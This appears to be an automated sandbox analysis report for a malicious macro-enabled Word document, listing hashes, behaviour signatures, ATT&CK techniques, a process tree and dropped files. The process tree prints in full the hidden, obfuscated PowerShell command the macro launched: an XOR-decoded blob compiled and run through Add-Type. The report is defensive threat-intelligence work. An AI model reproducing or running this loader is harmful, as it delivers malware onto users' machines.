ecdf26dffbf572bde7ae3b7fbc4f92e958dcf41f047a8af086e131173c49090d

Analysis

max time kernel
117s
max time network
127s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
16-11-2024 12:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2020-01-09_174205.docm
Size

164KB
MD5

da314846063cf72c4aa800c4d6a88f8f
SHA1

a01a8905965d59f896968958f9b39115420a636b
SHA256

068f7e67f52d97eef2929a08dad735e85dc91bebc2e14b794cb670f915a1074b
SHA512

62102482e1206317abb4bd3adefcb3134d0d9133c10ac988990e6ebead2b4dee30e2374a0635f07850206d813cce22d412b316ac6b246f7a330ccbebf5ecc15a
SSDEEP

3072:0UgwWw+CnDOLnT0dRGLvkD4Q74N6GO2FMgZ4E56VvdvbFcZ:CHMDy0UkDL4MGO2n5y6

Score

10^/10

discovery execution

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2596	2788	powershell.exe	30

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2596	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2788	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2788	WINWORD.EXE
2788	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2788 wrote to memory of 2596	2788	WINWORD.EXE	31
PID 2788 wrote to memory of 2596	2788	WINWORD.EXE	31
PID 2788 wrote to memory of 2596	2788	WINWORD.EXE	31
PID 2788 wrote to memory of 2596	2788	WINWORD.EXE	31
PID 2788 wrote to memory of 2648	2788	WINWORD.EXE	34
PID 2788 wrote to memory of 2648	2788	WINWORD.EXE	34
PID 2788 wrote to memory of 2648	2788	WINWORD.EXE	34
PID 2788 wrote to memory of 2648	2788	WINWORD.EXE	34
PID 2596 wrote to memory of 2980	2596	powershell.exe	35
PID 2596 wrote to memory of 2980	2596	powershell.exe	35
PID 2596 wrote to memory of 2980	2596	powershell.exe	35
PID 2596 wrote to memory of 2980	2596	powershell.exe	35
PID 2980 wrote to memory of 2272	2980	csc.exe	36
PID 2980 wrote to memory of 2272	2980	csc.exe	36
PID 2980 wrote to memory of 2272	2980	csc.exe	36
PID 2980 wrote to memory of 2272	2980	csc.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020-01-09_174205.docm"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden function re7db1a {param($p58848)$z325bc='d795b';$z3fb8f='';for ($i=0; $i -lt $p58848.length;$i+=2){$m386b1c=[convert]::ToByte($p58848.Substring($i,2),16);$z3fb8f+=[char]($m386b1c -bxor $z325bc[($i/2)%$z325bc.length]);}return $z3fb8f;} $lb6b45 = '1144505b054464404616015a0240110d595e15311d444d500f4a654c5b160d5a5c1b2b0a435c470d14645c47140d545c46591144505b054464404616015a17710b0550575a11105e5a46591144505b054464404616015a177c2d5f424a5c0c03176a4c111052541b2c014302386814425b590b07175a59031744195d040703080c193f7355592b09475647164c155250100a52550650461b7c5b16164e695a0b0a43041725014369470d07765d511001444a174b3917494000085e5a151110564d5c0144524141071659197c0c10674d47421e05005355501f705b1634434b150e01555f505048444d470b0a501950570105081c593f7355592b09475647164c155250100a52550650461b19700c104540650d0d594d155f4415755a03007b505710054540174b3917494000085e5a151110564d5c0144524141071659197c0c10674d4742030e5a0704051f4a41100d595e15100600005656011e026e26085b7058120b454d1d400f524b5b0708040b174e44725741101d67565c0c100a1b630b16434c540e344556410707431b1c3f44474c570e0d541946160543505642014f4d50100a175b5a0d081741515a5306117c0c10674d474203040a07534862705b1634434b151102550d0d5a561b19400b0a4319580157050119420b424d15170d594d1501010f000d4b5f6c7d590e2d5a495a10101f1b7e0716595c595156195d590e461b19700c104540650d0d594d0840364355780d125274500f0b4540174e44645c412e05444d701016584b0804055b4a504b39174a4103105e5a15071c435c470c4441565c06444f5800515d1f705b1634434b150f570258514e2d594d651616175f5653510401190b0a43194c0653030c01504d0c494000085e5a151110564d5c01445e57414209060c04565655111c192d594d6516161755025b0504190842030e5a0704051f4b5055005508544a46070c000350560c5656070709000051021b1c4b5f5e5f1d0e530e58065f597e5741321045176f071658104e050b4356150a010f5a06075d0c447c0c10674d474217015802505604044f505d510e014a080000545148455c02060606581d4056020c545605025a065354000c035753000e045554050c045707030e174b4d0c50534a1701580250560404082b0a436941104a6d5c470d4d4c5e5a160b1751505a07045c0c591962705b1634434b150106025f015f4c62705b1634434b1c575f42505b164443580357570a090e0b021f184d065c00081d1152560e0750571b5a5757020315051a5007155a1710174d54545104101c1903584d5a420c52015651010e0248201d435c6e3f44440e5357000a42051a570615051a025115051a5d07440e2b0a4369411044470a5356050a745410175f58594c255b555a012c70555a00055b11064b5f7a5847110c56551b210b47401d1153510c514e541b490604505615064b5f4f5800515d1f575015447e574132104511465405000b07514a63567c0c10010d1d4b4f07410552555510191257510d544e571e025d075c540a505b5e176e5000275b50500c10174b5600505600080c01401962070674555c070a43111c5917434b5c0c031751535755560d08270a4150470d0a5a5c5b164a705c41240b5b5d501034564d5d4a21594f5c100b5954500c10196a4507075e5859240b5b5d50104a7649450e0d5458410b0b597d5416051e12173e384501505153561b1e1001005d5753051f1b010351050d04575415100e1007550d545b4a7356420c08585851240d5b5c1d1001005d5753051f1b050150040d51565102010100550f0c505653070e055454010957530607080550550f0c515656075f010351050d0457541510190a02020854564d0c69470d07524a463110564b412b0a5156151301015a005b500a57501544674b5a0101444a661605454d7c0c0258115d04510658014b5f674b5a0101444a1b3110564b414a15520f56575d03100e1001434c470c44070248121155555c0144444d54160d54194616165e57524216520e51005556114616165e5752420f045f54075703104e111045505b05445b5c57040105041706530e0c57405f444d470b0a5019525b07055f545f37434b5c0c03197c5812104e02530d161f505b16445e0405590d0b52060405520a014c28525752160c0c501e5f561e42571b1052194f505d510e015f2758574307164317610d264e4d504a0f045f5407570317661706444d470b0a50115c4e561e1504544d0c5e0c015651581e5f4c545154104d1f43075b02000d153c445b5c57040105621d0b4b05101547445b5c570401051779070a504d5d3f4d0c44470710424b5b42030e5a0704050c4448'; $lb6b452 = re7db1a($lb6b45); Add-Type -TypeDefinition $lb6b452; [hfc419]::m15142b();
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gpvzhwys.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1269.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1258.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2272
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1269.tmp

Filesize
1KB

MD5
6ae6fb32dc913487b9444c7dc1c49e57

SHA1
20f35ff43c0012a6e339c8e54a7c27f90ed1fca9

SHA256
cc4928e21953db4be8c2af04ffae9dc48d4adaaea692991c14eae6be03369758

SHA512
8e7766097d850b06c5f0f15e98d95966f921e28950dfed80bd31e4c570cd4ce7bd99f5c567a6ad6d24faf9d1867efd972116db96e875d6bd2f33ce24c7dd8718

Download Submit
C:\Users\Admin\AppData\Local\Temp\gpvzhwys.dll

Filesize
5KB

MD5
b37a84aac2e961d91b3c2ba452f40194

SHA1
c53d5442b69fcee37f90f3be448f1b9efcd71e24

SHA256
9d3a3b6ce2b7769bbc7ee9bb2b8224ee74ef08e2ed3003086ad7a8c6a5969f92

SHA512
799c6f82378eb4f35869d879f0e3ca71c58ab99b923e29ed163a176548bf567e5205053b77296c99e900683d7390aa7d8f5bfffbc81235851d19150d7669e585

Download Submit
C:\Users\Admin\AppData\Local\Temp\gpvzhwys.pdb

Filesize
11KB

MD5
dbd530944826f92dfd652bc33c20c55b

SHA1
a9b3440d7e0678af88719914db0ca5c00e402a3f

SHA256
54378b7bfd17cda7d3c96b5b9a82e863130122d597e52f56ebb071b9d0447428

SHA512
cd15614bb55f1610d08b54ea8ea945fb96ce4bb2b33029f0cb1b4ffc5fc4fe2c5302496e38202978dd06d396ec137cc3accc03f8c302705ccb8e849b0eb3c9ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1258.tmp

Filesize
652B

MD5
ad5cd0264ed394a277aa4d95f717e91a

SHA1
483145cf9f1b24bf641f8cbd3057991aca6111e5

SHA256
ee93ca5e8d5277948daca10cd4dc91394c99c646cd2316413d0b7f10d0ef22a5

SHA512
fbadbdce0e0de22adf18b0960d3d023b55af4c1bf41de16844d6624fe4c75ac405d68ee1bf77c76d238249006b178f5a7fa0393c31cb03b8d2bb4403d4328013

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpvzhwys.0.cs

Filesize
1KB

MD5
cf28846064bf71b24e9a2c354c2cc5cc

SHA1
3fdadba7d721bccf01bd298cf33274f087a22485

SHA256
a8a4b52b88e3cb6a6f35e958be9794e92027d9c939bff058ebfeaeda673c5096

SHA512
c280f7732d1bd40cb0fd144ea7140fa5e8ece8276bb4fb4c599a34821a2292216e3a21d5f122dbe1a4df208f1d4454e87b6f185d67a5269098609a840c7ecd2d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpvzhwys.cmdline

Filesize
309B

MD5
4ee19fedfa15cf1c24b098f29e2387d8

SHA1
0c9dec1613264ca81b2d6191260bb4e7f6dc34bc

SHA256
215e4f282c7830c06b4c74d2e66527232e779967ebc6492bd9495bf3fa05ce20

SHA512
8c983da00e8da47b33fe766014aa51c82628c556e79c89411590a1a27623a82d3c53604bd836928fd5561f7981a378c4ecb0aae3dd807ddd0241b6fbe13d75ba

Download Submit
memory/2788-0-0x000000002F4E1000-0x000000002F4E2000-memory.dmp

Filesize
4KB

Download
memory/2788-14-0x0000000005F30000-0x0000000006030000-memory.dmp

Filesize
1024KB

Download
memory/2788-13-0x0000000005F30000-0x0000000006030000-memory.dmp

Filesize
1024KB

Download
memory/2788-2-0x000000007159D000-0x00000000715A8000-memory.dmp

Filesize
44KB

Download
memory/2788-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2788-37-0x000000007159D000-0x00000000715A8000-memory.dmp

Filesize
44KB

Download
memory/2788-38-0x0000000005F30000-0x0000000006030000-memory.dmp

Filesize
1024KB

Download
memory/2788-39-0x0000000005F30000-0x0000000006030000-memory.dmp

Filesize
1024KB

Download